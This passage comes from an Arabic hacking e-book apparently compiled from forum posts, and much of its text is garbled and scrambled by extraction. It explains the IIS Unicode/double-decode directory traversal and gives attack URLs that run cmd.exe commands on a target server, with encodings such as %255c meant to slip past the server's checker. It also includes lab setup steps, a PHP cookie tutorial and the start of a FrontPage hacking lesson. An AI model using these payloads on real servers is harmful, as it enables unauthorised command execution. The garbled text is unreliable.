ﺘ ﺤﺎناﻻو لﻓﻰ MCSEﻓﻰ ﺧﻼ لاﺳﺒﻮﻋﯿﻦان ﺷﺎ ءا ﷲﺗﻌﺎﻟﻰ وﺑﻌﺪ ﺘﻬﻰ ﻣﻦاﻻﻣ ﺘﻰاﻧا ﺻﺒ ﺮوا ﻋﻠﻰﻗﻠﯿﻼ ﺣ
ﺘﻔﺼﯿ ﻞان ﺷﺎ ءا ﷲﺑ ﺲاﺻﺒ ﺮو ﺷﻮى ذﻟﻚ ﻧﻌﻮداﻛﺜ ﺮﻗﻮه و ﻧﺸ ﺮ حﻟﻜﻢ ﻫﺬهاﻟﻨﻘﻄﻪﺑﺎﻟ
ﺘﺄﻛﺪاﻧﻚ ﻻ ﺘﺒﻬﺎﻓﻰاﻟﺜﻐ ﺮه واﻧﺎ ﻣ ﺘﻰﺗﻜ ﺘﻘﺪاﻧﻚاﻻنﻓﻬﻤ ﺖ ﻣﺎ ﻫﻰا ل argumentsﻮ ﻣﺎﻓﺎﺋﺪه /cﺎﻟ ﺎﻋ
ﺗﻌ ﺮ ف ﻣﻌﻨﺎﻫﺎ .
ﻗﻊﺘ ﺤﻜﻢﺑﺎﻟﻤﻮ ﺗﻌﺎﻟﻮ ﻧ ﺮو حﻟﻨﻘﻄﻪ ﺳﻬﻠﻪ وﺑﺴﯿﻄﻪ ﺟﺪاااﻓﻰاﻟﺜﻐ ﺮه ،اﻧ ﺖﺗﺸﻐ ﻞا ل cmd.exeﻻﻧﻚﺗ ﺮﯾﺪانﺗ
وﺗﻐﯿ ﺮاﻻﻧﺪﻛ ﺲ واﻟ ﺦ و وﻟﻜﻦﺗﻌﺎﻟﻰ ﻣﺜﻼ ﻧﺸﻐ ﻞاى ﻣﻠ ﻒﺗﺎﻧﻰ ﯾﺎﺗ ﺮىﻛﯿ ﻒ ﻧﺸﻐﻠﻪ ؟
ﻗﻠﻚﻛﯿ ﻒ ::ﻛ ﻞ ﻣﺎ ﻋﻠﯿﻚﻓﻌﻠﻪ ﻫﻮانﺗﻘﻮمﺑﻮ ﺿﻊاﺳﻢاﻟﻔﺎﯾ ﻞاﻟﺬىﺗ ﺮﯾﺪﺗﺸﻐﯿﻠﻪﺑﻬﺬااﻟﺸﻜ ﻞ ﺎﻧﺎ را حا
Ping.exe+PRINTﺑﻼ ﻣﻦ cmd.exe?/cﻮﺑﻬﺬاﺗﻜﻮنﻗﺪ ﺷﻐﻠ ﺖاﻟﻔﺎﯾ ﻞ ﺎﻟﺬىﺗ ﺮﯾﺪه
(enjoy this ) .ﺣﯿﺚﺗﺼﺒﺢاﻟﺜﻐ ﺮهﺑﻬﺬااﻟﺸﻜ ﻞ ::
http://issserver/scripts/..%5c..%.../ping.exe+PRINT
ﺘﻰ ﺳﯿﻨﻔﺬ ﻋﻠﯿﻬﺎﺘﺎﻟﻰﻛﻤﺎ ﻋ ﺮﻓﻨﺎﻓﻮ قاﻧﺎ /cﻫﻰا ل argumentﻟ ﻞ cmd.exeﺎواﻟ ﺤﺎﻟﻪاﻟ * /c+ -ﻮﺑﺎﻟ
ﺘﯿﻦﻓﻰاﻟﺜﻐ ﺮه وﻟﻜﻦ ﻻ ﺘﻰﺑﺠﺎﻧﺐا ل /cﻓﻬﻰﺑﻤﻘﺎماﻟﻤﺴﺎﻓﻪﺑﯿﻦ ﺎﻟﻜﻠﻤ ا ل cmdﺎﻻﻣ ﺮاﻣﺎ ﻋﻼﻣﻪا ل +اﻟ
ﯾﻤﻜﻨﻨﺎاﺳﺒﺪاﻟﻬﺎﺑﻤﺴﺎﻓﻪ ﻋﺎدﯾﻪ وﺑﻌﺪﻫﺎ ﯾﻜﻮناﻻﻣ ﺮاﻟﺬى ﯾ ﺤﻤﻠﻪ ﺳﻄ ﺮاﻻواﻣ ﺮﻟﯿﻨﻔﺪهﺛﻢ ﻋﻼﻣﻪ +ﺛﺎﻧﯿﻪ و
ﺘﻮﯾﺎﺗﻪ ﻋﻠﻰاﻟﺸﺎﺷﻪ ﺣﺎﻟﯿﺎ .
ﺑﻌﺪﻫﺎاﺳﻢاﻟﺪراﯾ ﻒاﻟﺬىﺗﻌ ﺮ ض ﻣ ﺤ
**ﻮ ﻧﺄﺗﻰاﻻن ﻻﻫﻢ ﻧﻘﻄﻪﻓﻰاﻟﺜﻐ ﺮه و ﻫﻰاﺳﺎﺳﺎ ﺳﺒﺐ ﺎﻟﺜﻐ ﺮهﻛﻤﺎ ذﻛ ﺮﻧﺎﻓﻰاو لاﻟﻜﻼم )ﻫﻮان ﺳﺒﺐاﻟﺜﻐ ﺮه
ﯾﻜﻮن ﺣ ﻞ ﺷﻔ ﺮهاﻟﻌﻨﻮاناﻛﺜ ﺮ ﻣﻦ ﻣ ﺮه (وﻫﺬا ﻣﺎ ﻧﻄﻠ ﻖ ﻋﻠﯿﻪا ل decodeﻮاﻧﺎ ﺷﺨﺼﯿﺎاﻓﺼ ﻞاﻟﺪﯾﻜﻮدز ﻋﻠﻰ
ﺘﻰ ﻧﺼ ﻞ ﻻﺑﺴﻂاﻟ ﺤ ﻞﻛﻤﺎﻓﻰاﻟ ﺮﯾﺎ ﺿﯿﺎ ت ﯾﻌﻨﻰ simplyfieyﺎىﺗﺒﺴﯿﻂ وﻓﻚاﻟﻤﻌﺎدﻟﻪﺗﻌﺎﻟﻮ اﻧﻪﺗ ﺤﻠﯿ ﻞ ﺣ
ﺧﻠﯿﻨﺎ ﻧﻔﻬﻤﻜﻢ ﻫﺬا ﻋﻠﻰاﻟﺜﻐ ﺮه ﻧﻔﺴﻬﺎ ::
١١٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﻰ ﻧﺸ ﺮ ح ﻋﻠﯿﻬﺎ ﻫﻰا ل ) / (slashﺣﯿﺚاﻧﻬﺎ ﻣﻦ ﺗﻌﺎﻟﻰ ﻧﺨ ﺶﻓﻰﺗﻔﺎ ﺻﯿ ﻞ ﺎﻟﺜﻐ ﺮهاﻛﺜ ﺮ و ﺳﻨﺄ ﺧﺬاﻟ ﺤ ﺮﻛﻪاﻟ
اﺳﺎﺳﯿﺎ ت ﺎﻟﺪﯾﻜﻮدﻓﻰ ﻫﺬهاﻟﺜﻐ ﺮه ::
ﺘﻔﻜ ﺮاﻻن
ﺷﻮ فﻓﻰ ﺟﺪو لا ل hex valueﺮا ح ﻧﺠﺪانا ل c , ٥% = /ﻃﺒﻌﺎﻫﺬاﻫﻮاﻟﺪﯾﻜﻮداﻻو لاﻟﺬى ﺳ
ﻗﻮ لﻟﻚ ﻫﺬا ﺧﻄﺄ ﻻن ﻫﺬاﻫﻮ ﺘﻨﺠﺢاﻟﺜﻐ ﺮه وﻟﻜﻦاﻧﺎا ﻓﻰاﻧﻚﺗ ﺤﺬ فا ل /وﺗ ﻀﻊﺑﺪﻻ ﻣﻨﻬﺎ ﻫﺬا ﺎ ل valueﻓ
ﺘﺠﺪاﻟﺪﯾﻘﻮداﻻو ل واﻧﺎ ذﻛ ﺮ تاناﻟﺪﯾﻜﻮد ﯾ ﺤﺪ ث ﻣﺮﺗﯿﻦاو ﻣﻤﻜﻦاﻛﺜ ﺮ ﯾﻌﻨﻰﻟﻮ و ﺿﻌ ﺖﻫﺬااﻟﺪﯾﻜﻮداﻻو لﻓﺴ
ﺘﻨﻔﯿﺬ وﻟﺬﻟﻚ ﻋﻠﯿﻨﺎان ﻧ ﺤﻠ ﻞﻫﺬاا ل value
ان ﺎ ل iisﻟﺪﯾﻪاﻟﻘﺪره ﻋﻠﻰان ﯾﻤﺴﻚﻫﺬااﻟﺪﯾﻜﻮد و ﯾﻤﻜﻨﻌﻪ ﻣﻦاﻟ
ﺘﻨﺠﺢاﻟﺜﻐ ﺮه ﺘﺎﻧﻰﻓ ﺘﻢاﻟﺪﯾﻜﻮداﻟ
ﺘﻰ ﯾ
ﺣ
ﺘﺎﻟﻰﻓﺴﻨ ﺤﺼ ﻞﻓﻰ
ﺘﺎﻟﻰ ﻧﺠﺪاﻧﻔﺴﻨﺎﻗﺪ ﺧﺪﻋﻨﺎا ل iis checkerﺑﺄﻧﻨﺎ ﺣﻠﻠﻨﺎا ل ﺷﻔ ﺮه ﻣﺮﺗﯿﻦ وﺑﺎﻟ ﻮﺑﺎﻟ
ﺘﺎﻟﻰﺗﻜﻮنﻗﺪ ﻧﺠ ﺤ ﺖاﻟﺜﻐ ﺮه .
اﻟﻤﻘﺎﺑ ﻞ ﻋﻠﻰاﻻﺻ ﻞ و ﻫﻮ /وﺑﺎﻟ
ﺘ ﺤﻠﯿ ﻞ ::
ﺘ ﺮﻛﯿﺒﻪاﻟﺼﺢﻟﻠ
ﻮ ﻋﺸﺎنﺗﻮ ﺿﺢاﻛﺜ ﺮ ﻣﻌﻚ را حا ﺣﻄﻠﻚﻛﯿ ﻒ ﺎﻟ
%255c %25 = % 5 = 5 c = c = %5c
%%35c % = % %35 = 5 c = c = %5c
%%35%63 % = % %35 = 5 %63 = c = %5c
%25%35%63 %25 = % %35 = 5 %63 = c = %5c
ﺘ ﺤﻠﯿﻼ ت
ﺘ ﺤﻠﯿ ﻞ ﻃﺒﻌﺎﻓﻰاﻻ ﺧ ﺮ ﯾﺠﺐان ﯾﺴﺎوىاﻟﺪﯾﻜﻮداﻻ ﺻ ﻞ و ﻫﻮﻛﻤﺎﻫﺔ وا ﺿﺢﻓﻰ ﻣﺜﺎﻟﻨﺎﻛ ﻞاﻟ ﺘﻢاﻟﺎراﺋﯿ
ﺘﻰ ﻧﺨﺪ عا ل iisﺗﺴﺎوى c ٥%وﻛﻤﺎ ذﻛ ﺮﻧﺎ %5c = /ﻮﻟﻜﻨﻨﺎ ﺣﻠﻠﻨﺎﻫﺬااﻟ ﺮﻣﺰاﻟﻰا ﻃﻮ ل واﺑﺴﻂﺗ ﺤﻠﯿ ﻞ ﺣ
checker .
ﻮﻓﻰاﻟﻨﻬﺎﯾﻪﺑﻌﺪﻓﻬﻤﻨﺎﻟﻠﺜﻐ ﺮه واﺳﺎﺳﻬﺎﻫﯿﺎﺗﻌﺎﻟﻮ ﻧﻄﺒﻘﻬﺎ ﻣﻊﺑﻌ ﺾ
ﺳﻮ ف ﻧ ﻀﻊاﻟﺜﻐ ﺮهﻓﻰ ﻫﺬااﻟﺸﻜ ﻞ ::
http://iisserver/scripts/..%5c..%...xe?/c+dir+c:+/s
١١٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﻫﺬااﻟ ﺮﻣﺰ
ﺘﻪﺑﻜ ﻞﻓﺎﯾ ﻞﻛﺒﯿ ﺮ و ﺻﻐﯿ ﺮﻓﻰ
ﻮ ﻋﻨﺪﻣﺎﺗﺪﻣ ﺞ ﻫﺬااﻟ ﺮﻣﺰ ﻣﻊاﻟﺜﻐ ﺮهﻛﻤﺎﻓﻰاﻟﻤﺜﺎ لاﻟﺴﺎﺑ ﻖ ﺳﻮ فﺗﺄﺗﯿﻚﻟﺴ
ﻛﻤﺒﯿﻮﺗ ﺮاﻟﻮﯾﺐ ﺳ ﺮﻓ ﺮ
ﺘﻰا ﺻ ﻞﻟﻬﺬااﻟﺸﻜ ﻞ ﻮا ﷲﺗﻌﺒ ﺖﻓﻰ ﻫﺬااﻟﺪرس وﺗﻌﺒ ﺖﻓﻰﻗ ﺮاﺋﻪاﻟﻤﻌﻠﻮﻣﺎ ت وﺗﺠﻤﯿﻌﻬﺎ ﻋﻦاﻟﯿﻮﻧﻰﻛﻮد ﺣ
ﺘ ﺤﺎﻧﻰاﻻو لﻓﻰ( MCSEﺎدﻋﻮﻟﻰ ﺘﻈ ﺮو ﻣﻮ ﺿﻮﻋﻰاﻟﻘﺎدمﺑﻌﺪﻣﺎاﻛﻮناﻧﻬﯿ ﺖاﻣ ﺎﻻ ﺧﻮه وان ﺷﺎ ءا ﷲاﻧ
ﻗﻬﺎ وﻓﺎﺋﺪها ل
ﺘ ﺮا
ﺘﻌﺎﻣ ﻞ ﻣﻊ ﺷﺒﻜﺎ ت وﯾﻨﺪوز ٢٠٠٠وﻛﯿﻔﯿﻪ ﺎ ﺧ
ﺑﺎﻟﻨﺠﺎ ح ( و ﺳﯿﻜﻮن ﻋﺒﺎره ﻋﻦﺗﻠﺨﯿ ﺺﻟﻠ
....WIN2000 RESOURCE KIT
١١٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐMaXhAk2000 :
$$$$$$$$$$$$$$$$$
ﺘ ﺮﻛﯿﺐ ﻧﻈﺎم وﯾﻨﺪوز ٢٠٠٠ﻋﻠﻰ ﺟﻬﺎزك .وﻓﻲ ﻧﻔ ﺲاﻟﺴﯿﺪيﺗﺒﻊاﻟﻨﻈﺎم ﻗﻊﻗﻢﺑ ﺘ ﺮا قاﻟﻤﻮا ﺘﺪرب ﻋﻠﻰإ ﺧ ﻟﻜﻲﺗ
ﺗﻘﻮمﺑﺈ ﺿﺎﻓﺔ ﺳﯿ ﺮﻓ ﺮ IISﻮذﻟﻚ ﻋﻦ ﻃ ﺮﯾ ﻖ :
ﺘ ﺤﻜﻢ. ﻗﻢﺑﺎﻟﺬﻫﺎبإﻟﻰﻟﻮ ﺣﺔ ﺎﻟ *١
ﻗﻢﺑﺎﻟﻨﻘ ﺮ ﻋﻠﻰإ ﺿﺎﻓﺔإزاﻟﺔﺑ ﺮاﻣ ﺞ. *٢
ﻗﻢﺑﺎﻟﻨﻘ ﺮ ﻋﻠﻰ زر "إ ﺿﺎﻓﺔﺈزاﻟﺔ ﻣﻜﻮﻧﺎ ت وﯾﻨﺪوز ". *٣
ﻗﻢﺑﻮ ﺿﻊ ﻋﻼﻣﺔ ﺻﺢ ﻋﻠﻰاﻟﺨﯿﺎراﻷو ل“ IIS” . *٤
ﻫﺬاﺑﺎﻟﻨﺴﺒﺔﻟﻜﯿﻔﯿﺔﺗﻨﺰﯾ ﻞاﻟﺴﯿ ﺮﻓ ﺮ..
ـ
ﺘﺎﻟﻲ:ﻗﻪﻓﻘﻢﺑﺎﻟ ﺘ ﺮاﺘﺪرب ﻋﻠﻰاﻟﺠﻬﺎزأيا ﺧ ﺎﻣﺎ ﻋﻦﻛﯿﻔﯿﺔاﻟ
ﺘﺪ ﺧ ﻞ ﻋﻠﯿﻪﺑﻌﺪ ﻣﺎﺗﺸﻐ ﻞﻗﻊﻓﻲ ﻣﺠﻠﺪ wwwrootﺎﻟﻤﻮﺟﻮد دا ﺧ ﻞ ﻣﺠﻠﺪ Inetpubﻃﺒﻌﺎ ﻫ ﻗﻢﺑﻮ ﺿﻊاﻟﻤﻮ
اﻟﺴﯿ ﺮﻓ ﺮ IISﻋﻦ ﻃ ﺮﯾ ﻖ
http://127.0.0.1/
ﺘﺸﻐﯿ ﻞﺑ ﺮﻧﺎﻣ ﺞ ﻋﻤ ﺮان ﺳﻜﺎنأوأيﺑ ﺮﻧﺎﻣ ﺞا ﺧ ﺮﻟﻠﻔ ﺤ ﺺ ﻋﻦ ﺘﺪرب ﻋﻠﯿﻬﺎﻗﻢﺑ ﻮﻹﯾﺠﺎداﻟﺜﻐ ﺮةﻓﻲاﻟﺠﻬﺎز واﻟ
ﻗﻢﺑﻮ ﺿﻊاﻟﻌﻨﻮانﺗﺒﻌﻚاﻟﻲﻫﻮ http://127.0.0.1/ اﻟﺜﻐ ﺮا تﺗﺒﻊاﻟﯿﻮﻧﯿﻜﻮد و
ﻗﻊاﻟﻤﺼﺎﺑﺔﺑﺎﻟﯿﻮﻧﯿﻜﻮد... ﺘ ﺮا قاﻟﻤﻮا ﺘﻬﺎﻓﻲ ﺎ ﺧ ﺘﻲﺗﻌﻠﻤ ﺘﻄﺒﯿ ﻖاﻟﻤﻬﺎرا تاﻟﻗﻢﺑ ﻮ
١ ٢٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐLinux Girl:
$$$$$$$$$$$$$
ـ
ــﻣﻘﺪﻣﺔ:
^^^^^^
ﺘﻤﻜﻦ ﻣﻦ
ﺘﺘﻬﺎ ﺳ
ﻗﻊاﻛﺜ ﺮﺗﻔﺎﻋﻠﯿﺔ ،ﻓﺒﻮاﺳﻄ
ـ ) cookiesﻣﻦاﻟﻮﺳﺎﺋ ﻞاﻟﻤﻔﯿﺪةﻓﻲاﻧﺸﺎ ء ﻣﻮا
ﺗﻌﺪاﻟﻜﻌﻜﺎ ت )اﻟ
ﻗﻌﻚ ﻣﻦﻗﺒ ﻞام ﻻ..ﺘﺼﻔﺢﺑﺰﯾﺎرة ﻣﻮ
ﻣﻌ ﺮﻓﺔ ﻫ ﻞﻗﺎماﻟﻤ
ﺘﺨﺪاﻣﻬﺎ...
ﺘﻌ ﺮ ف ﻋﻠﻰاﻟﻜﻌﻜﺎ ت وﻛﯿ ﻒ ﯾﻤﻜﻨﻨﺎاﺳ
ﻓﻲ ﻫﺬااﻟﺪرس ﺳﻨ
ﻣﻌﻠﻮﻣﺎ ت ﻋﺎﻣﺔ
^^^^^^^^
١ ٢١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﻗﻊﺗﻐﯿﯿ ﺮاﻟﻤﻌﻠﻮﻣﺎ تاﻟﻤﻮﺟﻮدة ﺿﻤﻦ ﻣﻠﻔﺎ تاﻟﻜﻮﻛﯿﺰأوإ ﺿﺎﻓﺔ ﻣﻌﻠﻮﻣﺎ ت ﺟﺪﯾﺪةﻛﻠﻤﺎﻗﻤ ﺖﺑﺰﯾﺎرة ﻮﺑﺈﻣﻜﺎناﻟﻤﻮ
ﻗﻚﺘﻢﺗﺨﺰﯾﻦﺑﻌ ﺾ ﻣﻠﻔﺎ تاﻟﻜﻮﻛﯿﺰﻓﻲاﻟﺬاﻛ ﺮةﻓﻘﻂ ،ﺑ ﺤﯿﺚ ﯾﺠ ﺮي ﺣﺬﻓﻬﺎ ﻣﺒﺎﺷ ﺮة ﻋﻨﺪإﻏﻼ ﻗﻊ .ﯾ
اﻟﻤﻮ
ﺘ ﺮة ﻣ ﺤﺪدة ﻋﻠﻰاﻟﻘ ﺮ صاﻟﺼﻠﺐ ﺘﻢﺗﺨﺰﯾﻨﻬﺎﻟﻔ ﺘﺼﻔﺢ ،وﻟﻜﻦ ﻣﻌﻈﻤﻬﺎ وﺗﺴﻤﻰ "ﻣﻠﻔﺎ تاﻟﻜﻮﻛﯿﺰاﻟﻤﺜﺎﺑ ﺮة" ،ﯾ اﻟﻤ
ﺘﻲ ﺘﻰ ﺳﻨﻮا ت .أﻣﺎﺑﻌ ﺾ ﻣﻠﻔﺎ تاﻟﻜﻮﻛﯿﺰاﻟ ﺘﻬﺎ ﻣﺪةﺄﺷﻬ ﺮأو ﺣ ﻗﺪﺗﺪوم ﺻﻼ ﺣﯿ ﺘﻬﺎ و
ﺘﻬﺎ ء ﺻﻼ ﺣﯿ ﻟ ﺤﯿﻦاﻧ
ﱠن ﻋﻠﻰﻗ ﺮ ﺻﻚاﻟﺼﻠﺐ .وﺗﻌﻮد ُﺨﺰُ ﺤﺬ ف ﻣﺒﺎﺷ ﺮة وﻻﺗﺘﺎرﯾ ﺦ ﺳﺎﺑ ﻖ ،ﻓﺈﻧﻬﺎﺗﺗﻌ ﺮ ضﺗﺎرﯾ ﺦ ﺻﻼ ﺣﯿﺔﻟ
ﻗﺪﺗﻌﻤﻢﺑﻌ ﺾاﻟﺸ ﺮﻛﺎ ت ﻗﻊاﻟﺬيأﺻﺪرﻫﺎﻓﻘﻂ ،و اﻟﻤﻌﻠﻮﻣﺎ تاﻟﻤﺨﺰﻧﺔﻓﻲ ﻣﻠﻔﺎ تاﻟﻜﻮﻛﯿﺰإﻟﻰ ﻣﺰودا تاﻟﻤﻮ
ﺘ ﻀﻤﻨﺔ ،وﻟﻜﻲ ﻻﺗﺼﺪر ﺘﻨﺴﯿ ﻖاﻟﻤﻌﻠﻮﻣﺎ تاﻟﻤﺘﻲﺗﺼﺪرﻫﺎ ﻋﻠﻰ ﺟﻤﯿﻊ ﻣﺰوداﺗﻬﺎ ،ﻟ اﻟﻜﺒ ﺮى ﻣﻠﻔﺎ ت ﺎﻟﻜﻮﻛﯿﺰاﻟ
ﻗﻊ.ﺘﻠﻔﺔﻓﻲاﻟﻤﻮ ﺘﺨﺪم ذاﺗﻪ ،ﻋﻨﺪ زﯾﺎرﺗﻪﻟﺼﻔ ﺤﺎ ت ﻣﺨ ﻛ ﻞ ﻣﻦ ﻣﺰوداﺗﻬﺎ ﻣﻠﻔﺎ تﻛﻮﻛﯿﺰﻟﻠﻤﺴ
code:
ﺘﺒﻪﺑﺎﻣﻜﺎﻧﻚ
value :ﺎﻟﻘﯿﻤﺔ ...ﻓﻘﻂﻗﯿﻢ ﻧﺼﯿﺔ ...ﻻ ﯾﻤﻜﻨﻚ و ﺿﻊ ﻣﺼﻔﻮﻓﺔﻛﻘﯿﻤﺔ وﻫﺬاأاﻣ ﺮ ﻣﻬﻢ ...ﻟﻜﻦاﻧ
ﺘﻐﯿ ﺮﻓﻲﺑﻲاﺗ ﺶﺘ ﺤﻮﯾ ﻞاي ﻣ ﺘﺨﺪماﻟﺪاﻟﺔ serializeﻟ
و ﺿﻊ ﻣﺼﻔﻮﻓﺔﻟﻜﻦﺑﻄ ﺮﯾﻘﺔا ﺧ ﺮى ...؟ﻛﯿ ﻒ ؟ :اﺳ
ﺘﺨﺪم unserializeﻻﻋﺎدﺗﻪاﻟﻰاﻟﺸﻜ ﻞاﻟﻄﺒﯿﻌﻲ. ﺑﻲاﻟﻰ ﺷﻜ ﻞ ﻧﺼﻲ و ﻣﻦﺛﻢاﺳ
١ ٢٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺼﻔﺢ ﻋﻠﻰ ﻗ ﺖ ﻋﻠﻰ ﺟﻬﺎزاﻟﻌﻤﯿ ﻞ و ﻋﻨﺪﻫﺎ ﻻ ﯾﻘﻮم ﺎﻟﻤ ﻗ ﻞ ﻣﻦاﻟﻮﻗ ﺖاﻟﻤﻌﻄﻰﻛﻤﺪ ﺧ ﻞاً :أن ﯾﻜﻮناﻟﻮﺛﺎﻧﯿﺎ
>--
ﺘﻬﻲاﻟﻤﺪة . ﺘﻰﻟﻮﻟﻢﺗﻨ ﺘﺨﺰﯾﻨﻬﺎ واذا وﺟﺪ تﻛﻌﻜﺔﺑﻨﻔ ﺲاﻻﺳﻢﻓﺎﻧﻪ ﯾ ﺤﺬﻓﻬﺎ ﺣ ﺟﻬﺎزاﻟﻌﻤﯿ ﻞﺑ
ﻗﻊ .
ﺘﺨﺪماﻟﻤﻮ ﺘﺼﻔﺢ وﺗﻔﻘﺪ ﺣﺎﻟﻤﺎ ﯾﻐﻠ ﻖاﻟﻤﺴ ﺘﺎﻓﺎناﻟﻜﻌﻜﺔﺗﺨﺰنﻓﻲ ذاﻛ ﺮة ﺎﻟﻤ ﻗً :إذاﻟﻢﺗ ﺤﺪد و
ﺛﺎﻟﺜﺎ
>--
ﻣﺜﺎ ل :
code:
?<
;)setcookie('site','http://www.palhackerz.com/',time()+3600
>?
ﻣﺜﺎ ل:
code:
?<
;)setcookie('site','',time()-360000
>?
١ ٢٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
<html>
<body>
<?
setcookie('site','palhackerz.com',time()+20000);
?>
</body>
</html>
<? setcookie('site','palhackerz.com',time()+20000);
?>
<html>
<body>
</body>
</html>
١ ٢٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﻣﺜﺎ ل :
code:
?<
;]'echo $_COOKIE['site
>?
ﻮ ﻫﺬهﺗﻄﺒﻊ :
code:
palhackerz.com
-ﻣﺎذاﻟﺪﯾﻨﺎ ؟
ﺘﯿﻦ : -١اﻟﻤﻠ ﻒ user.php :ﯾﻘﻮماﻟﻤﻠ ﻒﺑﻌﻤﻠﯿ
ﺘﺎرهاﻟﺰاﺋ ﺮ .
>--ﺎﻻوﻟﻰ :ﺗ ﺤﺪﯾﺪاﻟﻠﻮناﻟﺬي ﺎ ﺧ
ﺘﺎر
ﺘﯿﺎراﻟﻠﻠﻮن و ﺣﻔﻆاﻟﻠﻮن ﺎﻟﻤﺨ >--ﺎﻟﺜﺎﻧﯿﺔ :ﻋ ﺮ ض ﻧﻤﻮذجا ﺧ
١ ٢٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
<?
/*-----------------------
Created By : "Rasha"<rasha@h4palestine.com>
For : h4palestine.com
-------------------------*/
function display_form(){
?>
<html>
<body>
</FORM>
١ ٢٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
</FORM>
<?
function set_color(){
global $_GET;
setcookie('color',$_GET['color'],time()+36000);
header('Location:index.php');
function get_color(){
global $_COOKIE;
if(isset($_COOKIE['color'])){
return $_COOKIE['color'];
}else{
return "#FFFFFF";
١ ٢٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
{)(function clear_color
;)setcookie('color',$_GET['color'],time()-36000
;)'header('Location:index.php
}
// selection
{)'if ($do=='display_form
;)(display_form
{)"}elseif ($do=="set_color
;)(set_color
{)"}elseif ($do=="clear_color
;)(clear_color
}
>?
١ ٢٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
code:
<html>
<br>
<br>
</body>
</html>
..…
١ ٢٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐT.O.L. ( DeXXa ) :
$$$$$$$$$$$$$$$$$$$
*اﻻﻟﻤﺎمﺑﺎﻻﻧﺠﻠﯿﺰﯾﺔ .
ﻗﻪ .
ﺘ ﺮا
ـ FrontPage Server Extensionsوﻟﯿ ﺲﻛﯿﻔﯿﺔا ﺧ *ﻗ ﺮا ءةاﻟﻤﺰﯾﺪ ﻋﻦاﻟ
ﺘﻌﺎﻣ ﻞ ﻣﻊﺑ ﺮﻧﺎﻣ ﺞ . Microsoft Office FrontPage *ﻛﯿﻔﯿﺔاﻟ
ـ . CHMOD ﺘﻌﺎﻣ ﻞ ﻣﻊاﻟ
*ﻛﯿﻔﯿﺔاﻟ
ـ . Telnet ﺘﻌﺎﻣ ﻞ ﻣﻊاﻟ
*ﻛﯿﻔﯿﺔاﻟ
ﺘﻌﺎﻣ ﻞ ﻣﻊﺑ ﺮوﺗﻮﻛﻮ ل . HTTP *ﻛﯿﻔﯿﺔاﻟ
ﺘﻌﺎﻣ ﻞ ﻣﻊﻗﻮاﻋﺪاﻟﺒﯿﺎﻧﺎ تاﻟﻌﻼﺋﻘﯿﺔ . SQL*ﻛﯿﻔﯿﺔاﻟ
ﺘﻲﺗﻌﻤ ﻞﺑﻨﺎ ﺣﯿﺔاﻟﺨﺎدم Server Side Scriptingﺘﻌﺎﻣ ﻞ ﻣﻊأ ﺣﺪﻟﻐﺎ تاﻟﻮﯾﺐ واﻟ *ﻛﯿﻔﯿﺔاﻟ
. Language
@ ﺧ ﺮﯾﻄﺔاﻟﻤﻮ ﺿﻮ ع :
><><><><><><><><><><><><><><><><><><><><><><><><><><><><><
١ ٣٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
@ ﻣﻘﺪﻣﺔ :
ﺘﺨﻔﯿ ﻀﺎ ت
ﺘﺠﺪﻫﻢ ﯾﻘﺪﻣﻮناﻟﻌ ﺮو ض واﻟ
ﺘﻰ ﺷﺒ ﻞاﻟ ﺮا ﺣﺔﻟﻌﻤﻼﺋﻬﺎ ،ﻓﺘﺴﻜﯿﻦﺑﺄﻧﻮاﻋﻬﺎﺗﻮﻓﯿ ﺮ ﺷ ﺗﺴﻌﻰ ﺷ ﺮﻛﺎ تاﻟ
ـ PHPو ﻻر ﺿﺎ ءاﻟﻌﻤﻼ ء ﻣﺜ ﻞ دﻋﻢﻟ
CGIو Perlو SSLو FTPو . SQL
ﻗﻌﻬﻢﻫﻮ Microsoft ﺘﺼﻤﯿﻢ ﻣﻮا ﻗﻊ Webmastersﻓﺈناﻟﺒ ﺮﻧﺎﻣ ﺞاﻟﻤﻔ ﻀ ﻞﻟﻬﻢﻟ وﺑﺎﻟﻨﺴﺒﺔﻟﻤﺪار ءاﻟﻤﻮا
Office FrontPageواﻟﺬيﻛﻤﺎ ﻫﻮ ﻣﺒﯿﻦ ﯾﺄﺗﻲ
ﺘﻌﻤﺎﻟﻪﻛﻤﺎاﻧﻪ ﯾﻮﻓ ﺮﺑﻌ ﺾاﻟﺒ ﺮﻣﺠﯿﺎ ت ﻣﺜ ﻞ ﻋﺪاداﻟﺰوار ،وﻟﺬا ﺘﻤﯿﺰﺑﺴﻬﻮﻟﺔا ﺳ ﻣﻊ ﺣﺰﻣﺔ ، Officeاذ ﯾ
ﺘﺴﻜﯿﻦ دﻋﻢﻛﺎﻣ ﻞﻟﻠﺒ ﺮﻧﺎﻣ ﺞ . ﺗﻘﺪم ﺷ ﺮﻛﺎ تاﻟ
ﺘﻲﻟﻬﺎﻗﺎﻟﺒﯿﺔ
ﺘﺴﻜﯿﻦاﻟ
ﺘﻬﺎﻓﻲاﻟﺨﺎدم Serverاﻟﺨﺎ صﺑﺸ ﺮﻛﺔاﻟ
ﺘﻢﺗﺜﺒﯿ
